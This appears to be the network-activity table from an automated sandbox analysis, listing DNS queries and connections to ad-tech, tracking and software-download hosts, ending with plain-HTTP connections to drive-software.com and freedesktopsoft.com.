| US | 8.8.8.8:53 | 171.78.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.232.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.159.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.223.158.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.250.54.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.50.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.191.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.87.77.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.226.220.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.26.90.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.4.29.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.160.0.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.24.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.62.91.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.45.49.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.94.158.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.149.71.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.4.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.143.46.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.216.36.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.16.207.89.in-addr.arpa | udp |
| IE | 54.155.95.204:443 | ice.360yield.com | tcp |
| NL | 198.47.127.205:443 | simage2.pubmatic.com | tcp |
| GB | 185.64.191.214:443 | image8.pubmatic.com | tcp |
| IE | 54.220.253.172:443 | ap.lijit.com | tcp |
| US | 8.8.8.8:53 | ad.turn.com | udp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| IE | 52.48.246.250:443 | match.prod.bidr.io | tcp |
| US | 216.239.34.181:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | 62.113.111.34.in-addr.arpa | udp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 11.164.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn-download.avgbrowser.com | udp |
| SE | 184.31.15.41:443 | cdn-download.avgbrowser.com | tcp |
| SE | 184.31.15.41:443 | cdn-download.avgbrowser.com | tcp |
| IE | 34.253.176.232:443 | ce.lijit.com | tcp |
| US | 8.8.8.8:53 | simage4.pubmatic.com | udp |
| GB | 185.64.190.81:443 | simage4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 41.15.31.184.in-addr.arpa | udp |
| DK | 37.157.4.29:443 | c1.adform.net | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 54.175.125.175:443 | sync.srv.stackadapt.com | tcp |
| US | 8.8.8.8:53 | ads.avct.cloud | udp |
| US | 8.8.8.8:53 | dsp.adfarm1.adition.com | udp |
| DE | 85.114.159.118:443 | dsp.adfarm1.adition.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| US | 8.8.8.8:53 | ad.mrtnsvr.com | udp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| GB | 185.64.191.210:443 | image2.pubmatic.com | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 8.8.8.8:53 | bh.contextweb.com | udp |
| NL | 193.0.160.131:443 | p.rfihub.com | tcp |
| US | 8.8.8.8:53 | 81.190.64.185.in-addr.arpa | udp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| US | 8.8.8.8:53 | 118.159.114.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.163.102.34.in-addr.arpa | udp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| US | 8.8.8.8:53 | d5p.de17a.com | udp |
| US | 8.8.8.8:53 | uipglob.semasio.net | udp |
| US | 8.8.8.8:53 | match.adsby.bidtheatre.com | udp |
| SE | 213.155.156.165:443 | d5p.de17a.com | tcp |
| FR | 141.94.171.216:443 | pixel.onaudience.com | tcp |
| NL | 134.122.57.34:443 | match.adsby.bidtheatre.com | tcp |
| DK | 77.243.51.122:443 | uipglob.semasio.net | tcp |
| US | 8.8.8.8:53 | 131.169.93.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.171.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.57.122.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.156.155.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.51.243.77.in-addr.arpa | udp |
| GB | 185.64.190.81:443 | simage4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | stats.securebrowser.com | udp |
| US | 104.20.87.8:443 | stats.securebrowser.com | tcp |
| US | 8.8.8.8:53 | 8.87.20.104.in-addr.arpa | udp |
| US | 199.232.213.91:443 | softonic.com | udp |
| DE | 13.224.186.120:443 | c.amazon-adsystem.com | tcp |
| US | 204.79.197.237:443 | bat.bing.com | tcp |
| BE | 104.68.82.93:443 | images.sftcdn.net | tcp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| GB | 163.70.151.21:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| US | 13.33.173.196:443 | aax.amazon-adsystem.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| IE | 54.220.253.172:443 | ap.lijit.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| IE | 34.246.39.119:443 | ad.360yield.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | udp |
| NL | 185.89.210.122:443 | secure.adnxs.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| US | 178.128.135.204:443 | brightcombid.marphezis.com | tcp |
| US | 8.8.8.8:53 | 4288c427afd5be40c27d6c4f1c6e953d.safeframe.googlesyndication.com | udp |
| GB | 163.70.151.21:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | prod.us-east-1.cxm-bcn.publisher-services.amazon.dev | udp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| GB | 172.217.169.65:443 | 4288c427afd5be40c27d6c4f1c6e953d.safeframe.googlesyndication.com | tcp |
| US | 52.72.204.13:443 | prod.us-east-1.cxm-bcn.publisher-services.amazon.dev | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| IE | 67.220.226.233:443 | aax-eu.amazon-adsystem.com | tcp |
| DE | 51.89.9.251:443 | onetag-sys.com | tcp |
| IE | 34.255.28.200:443 | rtb.gumgum.com | tcp |
| FR | 91.134.110.133:443 | ssbsync-global.smartadserver.com | tcp |
| SE | 23.34.232.193:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 13.204.72.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| IE | 34.253.176.232:443 | ce.lijit.com | tcp |
| US | 13.248.245.213:443 | eb2.3lift.com | tcp |
| NL | 185.89.211.84:443 | secure.adnxs.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 35.244.159.8:443 | us-u.openx.net | udp |
| US | 54.175.125.175:443 | sync.srv.stackadapt.com | tcp |
| IE | 63.32.137.205:443 | pr-bh.ybp.yahoo.com | tcp |
| US | 8.8.8.8:53 | sync.ipredictive.com | udp |
| US | 8.8.8.8:53 | match.deepintent.com | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| FR | 91.134.110.133:443 | ssbsync-global.smartadserver.com | tcp |
| IE | 67.220.226.233:443 | aax-eu.amazon-adsystem.com | tcp |
| DK | 37.157.4.29:443 | c1.adform.net | tcp |
| US | 52.87.131.177:443 | sync.ipredictive.com | tcp |
| US | 8.18.47.7:443 | match.deepintent.com | tcp |
| US | 70.42.32.31:443 | b1sync.zemanta.com | tcp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | tg.socdm.com | udp |
| US | 8.8.8.8:53 | usersync.gumgum.com | udp |
| JP | 211.120.53.201:443 | tg.socdm.com | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| IE | 34.247.205.196:443 | usersync.gumgum.com | tcp |
| IE | 34.247.205.196:443 | usersync.gumgum.com | tcp |
| BE | 104.68.78.171:443 | secure-assets.rubiconproject.com | tcp |
| IE | 34.255.28.200:443 | rtb.gumgum.com | tcp |
| IE | 34.247.205.196:443 | usersync.gumgum.com | tcp |
| US | 8.8.8.8:53 | u.ipw.metadsp.co.uk | udp |
| IE | 34.247.205.196:443 | usersync.gumgum.com | tcp |
| IE | 34.247.205.196:443 | usersync.gumgum.com | tcp |
| NL | 34.91.62.186:443 | um.simpli.fi | tcp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| US | 8.8.8.8:53 | pixel-us-east.rubiconproject.com | udp |
| NL | 35.214.132.90:443 | u.ipw.metadsp.co.uk | tcp |
| JP | 211.120.53.201:443 | tg.socdm.com | tcp |
| NL | 35.214.223.82:443 | csync.loopme.me | tcp |
| US | 69.173.146.5:443 | pixel-us-east.rubiconproject.com | tcp |
| BE | 104.90.26.20:443 | eus.rubiconproject.com | tcp |
| DE | 13.32.27.67:443 | s.ad.smaato.net | tcp |
| NL | 198.47.127.205:443 | simage2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | cm-supply-web.gammaplatform.com | udp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | ipac.ctnsnet.com | udp |
| US | 8.8.8.8:53 | 213.245.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.32.42.70.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.47.18.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.131.87.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.205.247.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.132.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.27.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.53.120.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.146.173.69.in-addr.arpa | udp |
| US | 35.186.193.173:443 | ipac.ctnsnet.com | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | core.iprom.net | udp |
| SI | 195.5.165.20:443 | core.iprom.net | tcp |
| US | 8.8.8.8:53 | cm.adgrx.com | udp |
| US | 8.8.8.8:53 | green.erne.co | udp |
| IE | 54.217.19.5:443 | cm.adgrx.com | tcp |
| FR | 141.94.242.204:443 | green.erne.co | tcp |
| US | 8.8.8.8:53 | pixel-eu.onaudience.com | udp |
| FR | 146.59.148.16:443 | pixel-eu.onaudience.com | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| GB | 185.64.191.210:443 | image2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 173.193.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.165.5.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.19.217.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.242.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.148.59.146.in-addr.arpa | udp |
| US | 13.33.173.196:443 | aax.amazon-adsystem.com | tcp |
| IE | 54.220.253.172:443 | ap.lijit.com | tcp |
| IE | 34.246.39.119:443 | ad.360yield.com | tcp |
| US | 178.128.135.204:443 | brightcombid.marphezis.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 162.55.233.28:443 | sync.richaudience.com | tcp |
| FR | 185.255.84.152:443 | visitor.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | cs.krushmedia.com | udp |
| IE | 52.48.246.250:443 | match.prod.bidr.io | tcp |
| US | 8.8.8.8:53 | sync.serverbid.com | udp |
| NL | 69.173.156.149:443 | token.rubiconproject.com | tcp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| US | 8.8.8.8:53 | aorta.clickagy.com | udp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | data.adsrvr.org | udp |
| SE | 23.34.232.19:443 | cs.media.net | tcp |
| DE | 51.89.9.251:443 | onetag-sys.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| IE | 52.19.156.32:443 | jadserve.postrelease.com | tcp |
| US | 52.86.219.200:443 | cs-server-s2s.yellowblue.io | tcp |
| DE | 162.55.233.28:443 | sync.richaudience.com | tcp |
| US | 8.2.110.134:443 | cs.krushmedia.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| DE | 18.245.31.128:443 | api-2-0.spot.im | tcp |
| IE | 52.48.246.250:443 | match.prod.bidr.io | tcp |
| GB | 185.64.191.214:443 | image8.pubmatic.com | tcp |
| US | 35.244.174.68:443 | id.rlcdn.com | udp |
| US | 192.132.33.68:443 | bttrack.com | tcp |
| US | 67.202.105.21:443 | ssc-cms.33across.com | tcp |
| DE | 13.32.27.88:443 | sync.serverbid.com | tcp |
| US | 18.207.58.146:443 | aorta.clickagy.com | tcp |
| US | 54.175.125.175:443 | sync.srv.stackadapt.com | tcp |
| SE | 23.34.232.19:443 | cs.media.net | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| US | 8.8.8.8:53 | ads.betweendigital.com | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| NL | 188.42.189.197:443 | ads.betweendigital.com | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| GB | 185.64.190.81:443 | simage4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | matching.truffle.bid | udp |
| DE | 23.88.86.2:443 | matching.truffle.bid | tcp |
| US | 104.18.24.173:443 | s.tribalfusion.com | udp |
| DE | 23.88.86.2:443 | matching.truffle.bid | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | eu-u.openx.net | udp |
| US | 34.98.64.218:443 | eu-u.openx.net | tcp |
| US | 8.8.8.8:53 | 88.27.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.110.2.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.189.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.64.98.34.in-addr.arpa | udp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| US | 104.22.50.98:443 | mwzeom.zeotap.com | tcp |
| US | 8.8.8.8:53 | a.sportradarserving.com | udp |
| US | 8.8.8.8:53 | casale-match.dotomi.com | udp |
| US | 8.8.8.8:53 | pm.w55c.net | udp |
| US | 52.46.143.56:443 | s.amazon-adsystem.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| NL | 35.214.174.141:443 | a.sportradarserving.com | tcp |
| IE | 18.203.142.104:443 | pm.w55c.net | tcp |
| NL | 81.17.55.106:443 | rtb-csync.smartadserver.com | tcp |
| NL | 35.214.223.82:443 | csync.loopme.me | tcp |
| NL | 89.207.16.140:443 | casale-match.dotomi.com | tcp |
| NL | 81.17.55.106:443 | rtb-csync.smartadserver.com | tcp |
| DE | 18.158.94.28:443 | match.sharethrough.com | tcp |
| NL | 35.214.174.141:443 | a.sportradarserving.com | udp |
| US | 8.8.8.8:53 | 141.174.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.142.203.18.in-addr.arpa | udp |
| BE | 104.68.82.93:443 | images.sftcdn.net | tcp |
| GB | 185.64.190.81:443 | simage4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | track.adform.net | udp |
| IE | 54.220.253.172:443 | ap.lijit.com | tcp |
| IE | 52.48.246.250:443 | match.prod.bidr.io | tcp |
| IE | 34.253.176.232:443 | ce.lijit.com | tcp |
| DK | 37.157.6.237:443 | track.adform.net | tcp |
| NL | 35.214.223.82:443 | csync.loopme.me | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| US | 52.46.143.56:443 | s.amazon-adsystem.com | tcp |
| FR | 91.134.110.133:443 | ssbsync-global.smartadserver.com | tcp |
| US | 8.8.8.8:53 | 237.6.157.37.in-addr.arpa | udp |
| GB | 163.70.151.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | en.softonic.com | udp |
| US | 151.101.1.91:443 | en.softonic.com | tcp |
| US | 151.101.1.91:443 | en.softonic.com | tcp |
| US | 204.79.197.237:443 | bat.bing.com | tcp |
| BE | 104.68.82.93:443 | images.sftcdn.net | tcp |
| US | 3.161.82.43:443 | sdk.privacy-center.org | udp |
| DE | 13.224.186.120:443 | c.amazon-adsystem.com | tcp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| DE | 162.19.138.118:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | 2a25d08797b4beff1ef0db6b21a890fc.safeframe.googlesyndication.com | udp |
| US | 13.33.173.196:443 | aax.amazon-adsystem.com | tcp |
| DE | 13.224.186.120:443 | c.amazon-adsystem.com | tcp |
| GB | 172.217.169.65:443 | 2a25d08797b4beff1ef0db6b21a890fc.safeframe.googlesyndication.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| NL | 185.89.210.122:443 | secure.adnxs.com | tcp |
| IE | 34.246.39.119:443 | ad.360yield.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| IE | 54.220.253.172:443 | ap.lijit.com | tcp |
| US | 178.128.135.204:443 | brightcombid.marphezis.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| US | 8.8.8.8:53 | js.adscale.de | udp |
| US | 18.173.205.123:443 | js.adscale.de | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| DE | 141.95.98.64:443 | lb.eu-1-id5-sync.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| IE | 54.220.253.172:443 | ap.lijit.com | tcp |
| US | 8.8.8.8:53 | ih.adscale.de | udp |
| IE | 67.220.226.233:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | articles-img.sftcdn.net | udp |
| DE | 52.57.121.98:443 | ih.adscale.de | tcp |
| NL | 23.62.61.147:443 | articles-img.sftcdn.net | tcp |
| NL | 23.62.61.147:443 | articles-img.sftcdn.net | tcp |
| NL | 23.62.61.147:443 | articles-img.sftcdn.net | tcp |
| NL | 23.62.61.147:443 | articles-img.sftcdn.net | tcp |
| NL | 23.62.61.147:443 | articles-img.sftcdn.net | tcp |
| NL | 23.62.61.147:443 | articles-img.sftcdn.net | tcp |
| DE | 162.19.138.118:443 | lb.eu-1-id5-sync.com | tcp |
| DE | 51.89.9.251:443 | onetag-sys.com | tcp |
| DE | 178.63.248.57:443 | push-sdk.com | tcp |
| US | 8.8.8.8:53 | 123.205.173.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.121.57.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.248.63.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | uidsync.net | udp |
| DE | 23.88.8.125:443 | uidsync.net | tcp |
| DE | 23.88.8.125:443 | uidsync.net | tcp |
| US | 8.8.8.8:53 | cd.connatix.com | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| US | 172.64.146.152:443 | cd.connatix.com | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| US | 8.8.8.8:53 | cds.connatix.com | udp |
| US | 8.8.8.8:53 | 125.8.88.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.146.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.187.250.142.in-addr.arpa | udp |
| DK | 37.157.4.29:443 | c1.adform.net | tcp |
| US | 172.64.146.152:443 | cds.connatix.com | udp |
| US | 8.8.8.8:53 | match.justpremium.com | udp |
| DE | 3.73.253.208:443 | match.justpremium.com | tcp |
| US | 8.8.8.8:53 | capi.connatix.com | udp |
| NL | 139.45.197.227:443 | notix.io | tcp |
| US | 104.18.41.104:443 | capi.connatix.com | udp |
| US | 8.8.8.8:53 | ins.connatix.com | udp |
| US | 8.8.8.8:53 | vid.connatix.com | udp |
| US | 172.64.146.152:443 | vid.connatix.com | tcp |
| US | 172.64.146.152:443 | vid.connatix.com | tcp |
| US | 172.64.146.152:443 | vid.connatix.com | tcp |
| US | 172.64.146.152:443 | vid.connatix.com | tcp |
| US | 172.64.146.152:443 | vid.connatix.com | tcp |
| US | 172.64.146.152:443 | vid.connatix.com | tcp |
| US | 172.64.146.152:443 | vid.connatix.com | tcp |
| US | 8.8.8.8:53 | 208.253.73.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.41.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssum.casalemedia.com | udp |
| IE | 52.48.246.250:443 | match.prod.bidr.io | tcp |
| US | 52.223.40.198:443 | data.adsrvr.org | tcp |
| US | 13.248.245.213:443 | eb2.3lift.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| FR | 91.134.110.133:443 | ssbsync-global.smartadserver.com | tcp |
| US | 67.202.105.21:443 | ssc-cms.33across.com | tcp |
| DE | 18.158.94.28:443 | match.sharethrough.com | tcp |
| SE | 23.34.232.193:443 | ads.pubmatic.com | tcp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| DE | 13.32.27.67:443 | s.ad.smaato.net | tcp |
| NL | 35.214.223.82:443 | csync.loopme.me | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| FR | 154.54.250.81:443 | ads.stickyadstv.com | tcp |
| US | 8.8.8.8:53 | ads.yieldmo.com | udp |
| US | 104.18.36.155:443 | ssum.casalemedia.com | tcp |
| US | 52.86.219.200:443 | cs-server-s2s.yellowblue.io | tcp |
| SE | 23.34.232.19:443 | cs.media.net | tcp |
| US | 69.166.1.66:443 | sync.go.sonobi.com | tcp |
| US | 8.8.8.8:53 | cks.connatix.com | udp |
| IE | 63.34.222.62:443 | ads.yieldmo.com | tcp |
| IE | 63.34.222.62:443 | ads.yieldmo.com | tcp |
| US | 104.18.41.104:443 | cks.connatix.com | udp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 104.18.41.104:443 | cks.connatix.com | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | img.connatix.com | udp |
| GB | 142.250.200.10:443 | imasdk.googleapis.com | tcp |
| US | 172.64.146.152:443 | img.connatix.com | udp |
| FR | 185.255.84.152:443 | visitor.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | gsf-fl.softonic.com | udp |
| US | 199.232.194.133:443 | gsf-fl.softonic.com | tcp |
| US | 8.8.8.8:53 | 155.36.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.166.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| IE | 34.253.176.232:443 | ce.lijit.com | tcp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | tcp |
| DE | 51.89.9.251:443 | onetag-sys.com | tcp |
| SE | 23.34.232.19:443 | cs.media.net | tcp |
| NL | 185.89.210.122:443 | secure.adnxs.com | tcp |
| US | 52.223.40.198:443 | data.adsrvr.org | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | udp |
| GB | 142.250.200.10:443 | imasdk.googleapis.com | udp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| IE | 54.220.253.172:443 | ap.lijit.com | tcp |
| US | 69.173.146.5:443 | pixel-us-east.rubiconproject.com | tcp |
| NL | 69.173.156.149:443 | token.rubiconproject.com | tcp |
| US | 18.207.58.146:443 | aorta.clickagy.com | tcp |
| IE | 67.220.226.233:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.2.110.134:443 | cs.krushmedia.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| DE | 13.32.27.67:443 | s.ad.smaato.net | tcp |
| NL | 34.91.62.186:443 | um.simpli.fi | tcp |
| DE | 13.32.27.88:443 | sync.serverbid.com | tcp |
| US | 67.202.105.21:443 | ssc-cms.33across.com | tcp |
| FR | 91.134.110.133:443 | ssbsync-global.smartadserver.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| IE | 52.19.156.32:443 | jadserve.postrelease.com | tcp |
| US | 52.86.219.200:443 | cs-server-s2s.yellowblue.io | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| DE | 18.245.31.128:443 | api-2-0.spot.im | tcp |
| IE | 52.48.246.250:443 | match.prod.bidr.io | tcp |
| US | 54.175.125.175:443 | sync.srv.stackadapt.com | tcp |
| US | 192.132.33.68:443 | bttrack.com | tcp |
| US | 8.8.8.8:53 | 133.194.232.199.in-addr.arpa | udp |
| IE | 54.220.253.172:443 | ap.lijit.com | tcp |
| FR | 91.134.110.133:443 | ssbsync-global.smartadserver.com | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| US | 104.22.50.98:443 | mwzeom.zeotap.com | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| US | 104.22.50.98:443 | mwzeom.zeotap.com | tcp |
| US | 8.8.8.8:53 | pubads.g.doubleclick.net | udp |
| SE | 23.34.232.19:443 | cs.media.net | tcp |
| US | 52.46.143.56:443 | s.amazon-adsystem.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | ads.avads.net | udp |
| US | 34.128.133.112:443 | ads.avads.net | tcp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| IT | 142.250.180.163:443 | csi.gstatic.com | tcp |
| IT | 142.250.180.163:443 | csi.gstatic.com | tcp |
| IT | 142.250.180.163:443 | csi.gstatic.com | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| NL | 81.17.55.106:443 | rtb-csync.smartadserver.com | tcp |
| NL | 81.17.55.106:443 | rtb-csync.smartadserver.com | tcp |
| US | 34.128.133.112:443 | ads.avads.net | udp |
| NL | 81.17.55.106:443 | rtb-csync.smartadserver.com | tcp |
| US | 104.18.41.104:443 | img.connatix.com | udp |
| IT | 142.250.180.163:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | 112.133.128.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.180.250.142.in-addr.arpa | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| BE | 64.233.166.94:443 | beacons2.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| BE | 64.233.166.94:443 | beacons2.gvt2.com | tcp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | tcp |
| IE | 52.48.246.250:443 | match.prod.bidr.io | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | drive-software.com | udp |
| DE | 78.46.117.95:80 | drive-software.com | tcp |
| DE | 78.46.117.95:80 | drive-software.com | tcp |
| US | 8.8.8.8:53 | freedesktopsoft.com | udp |
| DE | 78.46.117.95:80 | freedesktopsoft.com | tcp |
| DE | 78.46.117.95:80 | freedesktopsoft.com | tcp |
| DE | 78.46.117.95:80 | freedesktopsoft.com | tcp |
| DE | 78.46.117.95:80 | freedesktopsoft.com | tcp |
| DE | 78.46.117.95:80 | freedesktopsoft.com | tcp |
